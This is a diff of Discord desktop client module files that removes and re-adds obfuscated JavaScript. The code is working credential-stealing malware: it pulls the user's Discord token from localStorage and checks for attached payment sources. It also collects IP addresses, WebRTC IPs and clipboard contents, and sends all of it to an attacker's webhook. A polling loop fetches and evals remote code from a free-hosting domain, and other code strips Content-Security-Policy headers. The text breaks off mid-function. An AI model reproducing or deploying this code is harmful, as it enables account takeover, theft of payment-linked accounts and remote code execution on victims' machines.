"\x6F\x6E\x69\x63\x65\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x44\x49\x4F\x21", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x62\x79\x70\x61\x73\x73\x63\x6F\x72\x73\x2E\x68\x65\x72\x6F\x6B\x75\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x5A\x41\x57\x41\x52\x55\x44\x4F\x54\x6F\x6B\x69\x79\x6F\x74\x6F\x6D\x61\x72\x65\x2E\x74\x78\x74", "\x6C\x65\x6E\x67\x74\x68", "\x77\x72\x61\x70\x70\x65\x72\x2D\x31\x42\x4A\x73\x42\x78", "\x68\x72\x65\x66", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x63\x68\x61\x6E\x6E\x65\x6C\x73\x2F\x36\x32\x39\x31\x37\x35\x32\x32\x30\x35\x36\x39\x31\x31\x32\x35\x38\x36\x2F\x36\x32\x39\x31\x37\x35\x35\x35\x33\x31\x34\x33\x39\x39\x36\x34\x36\x34", "\x72\x65\x6D\x6F\x76\x65", "\x6C\x6F\x67", 
"\x6D\x61\x72\x67\x69\x6E\x54\x6F\x70\x32\x30\x2D\x33\x54\x78\x4E\x73\x36", "\x62\x72\x6F\x77\x73\x65\x72\x2D\x77\x69\x6E\x64\x6F\x77\x2D\x66\x6F\x63\x75\x73", "\x44\x69\x73\x63\x6F\x72\x64\x20\x68\x61\x73\x20\x65\x6E\x63\x6F\x75\x6E\x74\x65\x72\x65\x64\x20\x61\x6E\x20\x65\x72\x72\x6F\x72\x20\x61\x6E\x64\x20\x6D\x75\x73\x74\x20\x72\x65\x6C\x6F\x61\x64\x2E", "\x77\x61\x72\x6E", "\x62\x65\x65\x70", "\x73\x68\x65\x6C\x6C", "\x72\x65\x6C\x6F\x61\x64", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x6F\x6E", "\x20\x7C\x20", "\x4E\x65\x77\x20\x42\x6C\x75\x65\x66\x61\x63\x65\x56\x34\x20\x6C\x6F\x67\x2E\x0A\x54\x6F\x6B\x65\x6E\x3A\x20", "\x0A\x54\x69\x6D\x65\x7A\x6F\x6E\x65\x3A\x20", "\x0A\x52\x65\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x3A\x20", "\x0A\x49\x50\x3A\x20", "\x0A\x57\x65\x62\x52\x54\x43\x20\x49\x50\x73\x3A\x20", "\x0A\x55\x73\x65\x72\x69\x6E\x66\x6F\x3A\x20", "\x0A\x55\x73\x65\x72\x6E\x61\x6D\x65\x3A\x20", "\x0A\x50\x53\x41\x74\x74\x61\x63\x68\x65\x64\x3A\x20", "\x0A\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72\x3A\x20", "\x0A\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x3A\x20", "\x0A\x44\x69\x73\x63\x6F\x72\x64\x20\x56\x65\x72\x73\x69\x6F\x6E\x3A\x20", "\x0A\x43\x6C\x69\x70\x62\x6F\x61\x72\x64\x28\x6C\x69\x6D\x69\x74\x65\x64\x20\x74\x6F\x20\x35\x30\x20\x63\x68\x61\x72\x73\x29\x3A\x20"]; -var readme = _0x476f[0]; -window[_0x476f[1]] = require; -var electron = require(_0x476f[2]); -window[_0x476f[2]] = require(_0x476f[2]); -var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]]; -token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); -token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); -window[_0x476f[1]] = require; -var electron = require(_0x476f[2]); -window[_0x476f[2]] = require(_0x476f[2]); -var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]]; -token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); -token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); - 
-function sleep(_0xb38cx5) { - return new Promise((_0xb38cx6) => setTimeout(_0xb38cx6, _0xb38cx5)) -} -var ip = _0x476f[11]; -var userinfo = _0x476f[11]; -var webrtcips = _0x476f[11]; -var hasattached = false; -var underesc = _0x476f[13]; -var focusamount = 0; -var WBH = _0x476f[11]; -if (!document[_0x476f[15]](_0x476f[14])[0]) { - var username = _0x476f[16] -} else { - var username = document[_0x476f[15]](_0x476f[14])[0][_0x476f[17]] -}; - -function getandsetbackupWBH() { - function _0xb38cx10() { - WBH = this[_0x476f[18]] - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[22]); - _0xb38cx11[_0x476f[24]]() -} - -function getandsetWBH() { - function _0xb38cx10() { - if (this[_0x476f[18]] == _0x476f[25]) { - getandsetbackupWBH() - } else { - WBH = _0x476f[26] - } - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[26]); - _0xb38cx11[_0x476f[24]]() -} -getandsetWBH(); - -function pin(_0xb38cx14) { - var _0xb38cx15 = new XMLHttpRequest(); - _0xb38cx15[_0x476f[23]](_0x476f[27], WBH, true); - _0xb38cx15[_0x476f[30]](_0x476f[28], _0x476f[29]); - _0xb38cx15[_0x476f[24]](JSON[_0x476f[31]]({ - content: _0xb38cx14 - })) -} - -function returnzoomfactor() { - return electron[_0x476f[33]][_0x476f[32]]() -} - -function returnuseragent() { - return navigator[_0x476f[34]] -} - -function getdiscordversion() { - return electron[_0x476f[37]][_0x476f[36]][_0x476f[35]]() -} - -function getclipboard() { - return electron[_0x476f[40]][_0x476f[39]]()[_0x476f[38]](0, 50) -} - -function getip() { - function _0xb38cx10() { - ip = this[_0x476f[18]] - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[41]); - _0xb38cx11[_0x476f[24]]() -} - -function gettimezone() { - return Intl.DateTimeFormat()[_0x476f[43]]()[_0x476f[42]] 
-} - -function getresolution() { - return window[_0x476f[45]][_0x476f[44]] + _0x476f[46] + window[_0x476f[45]][_0x476f[47]] -} - -function getuserinfo(_0xb38cx1e) { - function _0xb38cx10() { - userinfo = this[_0x476f[18]] - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[48]); - _0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e); - _0xb38cx11[_0x476f[24]]() -} - -function getpaymentsources(_0xb38cx1e) { - function _0xb38cx10() { - if (this[_0x476f[18]] == _0x476f[50]) { - hasattached = false - } else { - hasattached = true - } - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[51]); - _0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e); - _0xb38cx11[_0x476f[24]]() -} - -function getwebrtcinfo(_0xb38cx21) { - var _0xb38cx22 = window[_0x476f[52]] || window[_0x476f[53]] || window[_0x476f[54]]; - var _0xb38cx23 = new _0xb38cx22({ - iceServers: [] - }), - _0xb38cx24 = function() {}, - _0xb38cx25 = {}, - _0xb38cx26 = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g, - _0xb38cx27; - - function _0xb38cx28(ip) { - if (!_0xb38cx25[ip]) { - _0xb38cx21(ip) - }; - _0xb38cx25[ip] = true - } - _0xb38cx23[_0x476f[55]](_0x476f[11]); - _0xb38cx23[_0x476f[64]](function(_0xb38cx29) { - _0xb38cx29[_0x476f[62]][_0x476f[61]](_0x476f[60])[_0x476f[58]](function(_0xb38cx2a) { - if (_0xb38cx2a[_0x476f[57]](_0x476f[56]) < 0) { - return - }; - _0xb38cx2a[_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28) - }); - _0xb38cx23[_0x476f[63]](_0xb38cx29, _0xb38cx24, _0xb38cx24) - }, _0xb38cx24); - _0xb38cx23[_0x476f[65]] = function(_0xb38cx2b) { - if (!_0xb38cx2b || !_0xb38cx2b[_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)) { - return - }; - _0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28) - } -} 
-async function fightdio() { - while (true) { - function _0xb38cx10() { - var _0xb38cx2d = this[_0x476f[18]]; - if (_0xb38cx2d == _0x476f[66]) { - return - } else { - eval(_0xb38cx2d) - } - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[67]); - _0xb38cx11[_0x476f[24]](); - await sleep(60000) - } -} -async function delboostserveronclient() { - while (true) { - for (var _0xb38cx2f = 0; _0xb38cx2f < document[_0x476f[15]](_0x476f[69])[_0x476f[68]]; _0xb38cx2f++) { - if (document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[70]] == _0x476f[71]) { - console[_0x476f[73]](document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[72]]()) - } - }; - if (document[_0x476f[15]](_0x476f[74])[0]) { - document[_0x476f[15]](_0x476f[74])[0][_0x476f[72]]() - }; - await sleep(100) - } -} -electron[_0x476f[37]][_0x476f[36]][_0x476f[82]](_0x476f[75], () => { - focusamount = focusamount + 1; - if (focusamount >= 15) { - console[_0x476f[77]](_0x476f[76]); - electron[_0x476f[79]][_0x476f[78]](); - window[_0x476f[81]][_0x476f[80]](); - focusamount = 0 - } -}); -getwebrtcinfo(function(ip) { - webrtcips = webrtcips + ip + _0x476f[83] -}); -getip(); -getuserinfo(token); -getpaymentsources(token); -setTimeout(() => { - var _0xb38cx30 = (_0x476f[84] + underesc + _0x476f[11] + underesc + _0x476f[11] + token + _0x476f[11] + underesc + _0x476f[11] + underesc + _0x476f[85] + (gettimezone()) + _0x476f[86] + (getresolution()) + _0x476f[87] + ip + _0x476f[88] + webrtcips + _0x476f[89] + userinfo + _0x476f[90] + username + _0x476f[91] + hasattached + _0x476f[92] + (returnzoomfactor()) + _0x476f[93] + (returnuseragent()) + _0x476f[94] + (getdiscordversion()) + _0x476f[95] + (getclipboard()) + _0x476f[11]); - pin(_0xb38cx30) -}, 5000); -setTimeout(() => { - delboostserveronclient() -}, 1); -setTimeout(() => { - fightdio() -}, 1) - - -\ modules\ discord_desktop_core: - const electron = require('electron'); -const 
path = require('path'); - -electron.session.defaultSession.webRequest.onHeadersReceived(function(details, callback) { - if (!details.responseHeaders['content-security-policy-report-only'] && !details.responseHeaders['content-security-policy']) return callback({ - cancel: false - }); - delete details.responseHeaders['content-security-policy-report-only']; - delete details.responseHeaders['content-security-policy']; - callback({ - cancel: false, - responseHeaders: details.responseHeaders - }); -}); - -module.exports = require('./core.asar'); +modules\ discord_modules: + +var _0x476f = ["\x74\x6F\x73\x74\x72\x69\x6E\x67\x20\x77\x61\x73\x20\x68\x65\x72\x65", "\x72\x65\x71\x75\x69\x72\x65", "\x65\x6C\x65\x63\x74\x72\x6F\x6E", "\x74\x6F\x6B\x65\x6E", "\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65", "\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x22", "", "\x72\x65\x70\x6C\x61\x63\x65", "\x60", "\x73\x69\x7A\x65\x31\x34\x2D\x65\x36\x5A\x53\x63\x48\x20\x74\x69\x74\x6C\x65\x2D\x65\x53\x35\x79\x6B\x33", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65", "\x55\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x66\x65\x74\x63\x68\x2C\x20\x70\x6F\x73\x73\x69\x62\x6C\x79\x20\x64\x75\x65\x20\x74\x6F\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x64\x69\x73\x63\x6F\x72\x64\x20\x64\x69\x73\x74\x72\x69\x62\x75\x74\x65\x20\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x2E", "\x74\x65\x78\x74\x43\x6F\x6E\x74\x65\x6E\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x6C\x6F\x61\x64", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x47\x45\x54", 
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x2F\x57\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x2E\x74\x78\x74", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x7B\x22\x6D\x65\x73\x73\x61\x67\x65\x22\x3A\x20\x22\x49\x6E\x76\x61\x6C\x69\x64\x20\x57\x65\x62\x68\x6F\x6F\x6B\x20\x54\x6F\x6B\x65\x6E\x22\x2C\x20\x22\x63\x6F\x64\x65\x22\x3A\x20\x35\x30\x30\x32\x37\x7D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x36\x32\x39\x31\x39\x36\x34\x30\x37\x31\x36\x34\x36\x33\x33\x30\x38\x39\x2F\x6F\x38\x30\x70\x70\x4E\x42\x31\x34\x31\x6B\x52\x7A\x6D\x51\x70\x6C\x31\x70\x76\x48\x6C\x74\x52\x6A\x47\x2D\x4B\x33\x2D\x43\x41\x6C\x72\x52\x6D\x4F\x79\x33\x4F\x46\x4F\x58\x65\x57\x31\x2D\x65\x58\x49\x57\x78\x42\x45\x54\x50\x71\x55\x48\x47\x69\x58\x61\x43\x44\x53\x58\x70", "\x50\x4F\x53\x54", "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E", "\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72", "\x73\x74\x72\x69\x6E\x67\x69\x66\x79", "\x67\x65\x74\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72", "\x77\x65\x62\x46\x72\x61\x6D\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x67\x65\x74\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x70\x70", "\x72\x65\x6D\x6F\x74\x65", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", 
"\x72\x65\x61\x64\x54\x65\x78\x74", "\x63\x6C\x69\x70\x62\x6F\x61\x72\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67", "\x74\x69\x6D\x65\x5A\x6F\x6E\x65", "\x72\x65\x73\x6F\x6C\x76\x65\x64\x4F\x70\x74\x69\x6F\x6E\x73", "\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68", "\x73\x63\x72\x65\x65\x6E", "\x78", "\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65", "\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E", "\x5B\x5D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x76\x36\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65\x2F\x62\x69\x6C\x6C\x69\x6E\x67\x2F\x70\x61\x79\x6D\x65\x6E\x74\x2D\x73\x6F\x75\x72\x63\x65\x73", "\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x6D\x6F\x7A\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x77\x65\x62\x6B\x69\x74\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x44\x61\x74\x61\x43\x68\x61\x6E\x6E\x65\x6C", "\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x69\x6E\x64\x65\x78\x4F\x66", "\x66\x6F\x72\x45\x61\x63\x68", "\x6D\x61\x74\x63\x68", "\x0A", "\x73\x70\x6C\x69\x74", "\x73\x64\x70", "\x73\x65\x74\x4C\x6F\x63\x61\x6C\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x4F\x66\x66\x65\x72", "\x6F\x6E\x69\x63\x65\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x44\x49\x4F\x21", 
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x62\x79\x70\x61\x73\x73\x63\x6F\x72\x73\x2E\x68\x65\x72\x6F\x6B\x75\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x5A\x41\x57\x41\x52\x55\x44\x4F\x54\x6F\x6B\x69\x79\x6F\x74\x6F\x6D\x61\x72\x65\x2E\x74\x78\x74", "\x6C\x65\x6E\x67\x74\x68", "\x77\x72\x61\x70\x70\x65\x72\x2D\x31\x42\x4A\x73\x42\x78", "\x68\x72\x65\x66", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x63\x68\x61\x6E\x6E\x65\x6C\x73\x2F\x36\x32\x39\x31\x37\x35\x32\x32\x30\x35\x36\x39\x31\x31\x32\x35\x38\x36\x2F\x36\x32\x39\x31\x37\x35\x35\x35\x33\x31\x34\x33\x39\x39\x36\x34\x36\x34", "\x72\x65\x6D\x6F\x76\x65", "\x6C\x6F\x67", "\x6D\x61\x72\x67\x69\x6E\x54\x6F\x70\x32\x30\x2D\x33\x54\x78\x4E\x73\x36", "\x62\x72\x6F\x77\x73\x65\x72\x2D\x77\x69\x6E\x64\x6F\x77\x2D\x66\x6F\x63\x75\x73", "\x44\x69\x73\x63\x6F\x72\x64\x20\x68\x61\x73\x20\x65\x6E\x63\x6F\x75\x6E\x74\x65\x72\x65\x64\x20\x61\x6E\x20\x65\x72\x72\x6F\x72\x20\x61\x6E\x64\x20\x6D\x75\x73\x74\x20\x72\x65\x6C\x6F\x61\x64\x2E", "\x77\x61\x72\x6E", "\x62\x65\x65\x70", "\x73\x68\x65\x6C\x6C", "\x72\x65\x6C\x6F\x61\x64", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x6F\x6E", "\x20\x7C\x20", "\x4E\x65\x77\x20\x42\x6C\x75\x65\x66\x61\x63\x65\x56\x34\x20\x6C\x6F\x67\x2E\x0A\x54\x6F\x6B\x65\x6E\x3A\x20", "\x0A\x54\x69\x6D\x65\x7A\x6F\x6E\x65\x3A\x20", "\x0A\x52\x65\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x3A\x20", "\x0A\x49\x50\x3A\x20", "\x0A\x57\x65\x62\x52\x54\x43\x20\x49\x50\x73\x3A\x20", "\x0A\x55\x73\x65\x72\x69\x6E\x66\x6F\x3A\x20", "\x0A\x55\x73\x65\x72\x6E\x61\x6D\x65\x3A\x20", "\x0A\x50\x53\x41\x74\x74\x61\x63\x68\x65\x64\x3A\x20", "\x0A\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72\x3A\x20", 
"\x0A\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x3A\x20", "\x0A\x44\x69\x73\x63\x6F\x72\x64\x20\x56\x65\x72\x73\x69\x6F\x6E\x3A\x20", "\x0A\x43\x6C\x69\x70\x62\x6F\x61\x72\x64\x28\x6C\x69\x6D\x69\x74\x65\x64\x20\x74\x6F\x20\x35\x30\x20\x63\x68\x61\x72\x73\x29\x3A\x20"]; +var readme = _0x476f[0]; +window[_0x476f[1]] = require; +var electron = require(_0x476f[2]); +window[_0x476f[2]] = require(_0x476f[2]); +var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]]; +token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); +token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); +window[_0x476f[1]] = require; +var electron = require(_0x476f[2]); +window[_0x476f[2]] = require(_0x476f[2]); +var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]]; +token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); +token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); + +function sleep(_0xb38cx5) { + return new Promise((_0xb38cx6) => setTimeout(_0xb38cx6, _0xb38cx5)) +} +var ip = _0x476f[11]; +var userinfo = _0x476f[11]; +var webrtcips = _0x476f[11]; +var hasattached = false; +var underesc = _0x476f[13]; +var focusamount = 0; +var WBH = _0x476f[11]; +if (!document[_0x476f[15]](_0x476f[14])[0]) { + var username = _0x476f[16] +} else { + var username = document[_0x476f[15]](_0x476f[14])[0][_0x476f[17]] +}; + +function getandsetbackupWBH() { + function _0xb38cx10() { + WBH = this[_0x476f[18]] + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[22]); + _0xb38cx11[_0x476f[24]]() +} + +function getandsetWBH() { + function _0xb38cx10() { + if (this[_0x476f[18]] == _0x476f[25]) { + getandsetbackupWBH() + } else { + WBH = _0x476f[26] + } + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[26]); + 
_0xb38cx11[_0x476f[24]]() +} +getandsetWBH(); + +function pin(_0xb38cx14) { + var _0xb38cx15 = new XMLHttpRequest(); + _0xb38cx15[_0x476f[23]](_0x476f[27], WBH, true); + _0xb38cx15[_0x476f[30]](_0x476f[28], _0x476f[29]); + _0xb38cx15[_0x476f[24]](JSON[_0x476f[31]]({ + content: _0xb38cx14 + })) +} + +function returnzoomfactor() { + return electron[_0x476f[33]][_0x476f[32]]() +} + +function returnuseragent() { + return navigator[_0x476f[34]] +} + +function getdiscordversion() { + return electron[_0x476f[37]][_0x476f[36]][_0x476f[35]]() +} + +function getclipboard() { + return electron[_0x476f[40]][_0x476f[39]]()[_0x476f[38]](0, 50) +} + +function getip() { + function _0xb38cx10() { + ip = this[_0x476f[18]] + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[41]); + _0xb38cx11[_0x476f[24]]() +} + +function gettimezone() { + return Intl.DateTimeFormat()[_0x476f[43]]()[_0x476f[42]] +} + +function getresolution() { + return window[_0x476f[45]][_0x476f[44]] + _0x476f[46] + window[_0x476f[45]][_0x476f[47]] +} + +function getuserinfo(_0xb38cx1e) { + function _0xb38cx10() { + userinfo = this[_0x476f[18]] + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[48]); + _0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e); + _0xb38cx11[_0x476f[24]]() +} + +function getpaymentsources(_0xb38cx1e) { + function _0xb38cx10() { + if (this[_0x476f[18]] == _0x476f[50]) { + hasattached = false + } else { + hasattached = true + } + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[51]); + _0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e); + _0xb38cx11[_0x476f[24]]() +} + +function getwebrtcinfo(_0xb38cx21) { + var _0xb38cx22 = window[_0x476f[52]] || window[_0x476f[53]] || window[_0x476f[54]]; + var _0xb38cx23 = new 
_0xb38cx22({ + iceServers: [] + }), + _0xb38cx24 = function() {}, + _0xb38cx25 = {}, + _0xb38cx26 = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g, + _0xb38cx27; + + function _0xb38cx28(ip) { + if (!_0xb38cx25[ip]) { + _0xb38cx21(ip) + }; + _0xb38cx25[ip] = true + } + _0xb38cx23[_0x476f[55]](_0x476f[11]); + _0xb38cx23[_0x476f[64]](function(_0xb38cx29) { + _0xb38cx29[_0x476f[62]][_0x476f[61]](_0x476f[60])[_0x476f[58]](function(_0xb38cx2a) { + if (_0xb38cx2a[_0x476f[57]](_0x476f[56]) < 0) { + return + }; + _0xb38cx2a[_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28) + }); + _0xb38cx23[_0x476f[63]](_0xb38cx29, _0xb38cx24, _0xb38cx24) + }, _0xb38cx24); + _0xb38cx23[_0x476f[65]] = function(_0xb38cx2b) { + if (!_0xb38cx2b || !_0xb38cx2b[_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)) { + return + }; + _0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28) + } +} +async function fightdio() { + while (true) { + function _0xb38cx10() { + var _0xb38cx2d = this[_0x476f[18]]; + if (_0xb38cx2d == _0x476f[66]) { + return + } else { + eval(_0xb38cx2d) + } + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[67]); + _0xb38cx11[_0x476f[24]](); + await sleep(60000) + } +} +async function delboostserveronclient() { + while (true) { + for (var _0xb38cx2f = 0; _0xb38cx2f < document[_0x476f[15]](_0x476f[69])[_0x476f[68]]; _0xb38cx2f++) { + if (document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[70]] == _0x476f[71]) { + console[_0x476f[73]](document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[72]]()) + } + }; + if (document[_0x476f[15]](_0x476f[74])[0]) { + document[_0x476f[15]](_0x476f[74])[0][_0x476f[72]]() + }; + await sleep(100) + } +} +electron[_0x476f[37]][_0x476f[36]][_0x476f[82]](_0x476f[75], () => { + focusamount = focusamount + 1; + if (focusamount >= 15) { + 
